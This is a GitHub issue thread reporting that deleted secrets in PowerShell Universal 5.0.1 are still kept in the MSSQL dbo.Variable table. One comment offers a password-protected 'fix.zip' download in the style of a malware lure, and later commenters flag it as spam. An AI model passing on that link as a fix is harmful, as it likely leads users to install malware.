### ISSUE TITLE
5.0.1 - Secret Variables are still retained in the DB after deleting them

### ISSUE THREAD

**Issue by donlent** [ironmansoftware/powershell-universal#3654]
### Version

5.0.1

### Severity

Low

### Environment

msi

### Steps to Reproduce

Using MSSQL

- Create a new Secret and store it in the DB
- Check the DB Table "dbo.Variable"
- The Secert will be there...
- Delete the Variable / Secret from the UI
- Re-Check the DB Table "dbo.Variable"
- The Secret is still stored in the DB as "stale object":
![image](https://github.com/user-attachments/assets/fd615e17-3dde-431d-9309-52cc966d6f43)

### Expected behavior

```console
The Secret should also be deleted from the DB when it gets deleted from the UI
```

### Actual behavior

```console
The Secret is retained in the DB.
Only normal variables stored in the DB are cleanly deleted also from the DB when they're deleted from the UI. So the behavior of the second Table "dbo.VariableValues" is correct.
```

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MikeShepard** [comment]
I reported that user.  They posted the same spammy content on several issues,

**Comment by adamdriscoll** [comment]
Have another user posting this stuff as well....I reported them too. Hopefully not a trend. Thanks for helping mop up.
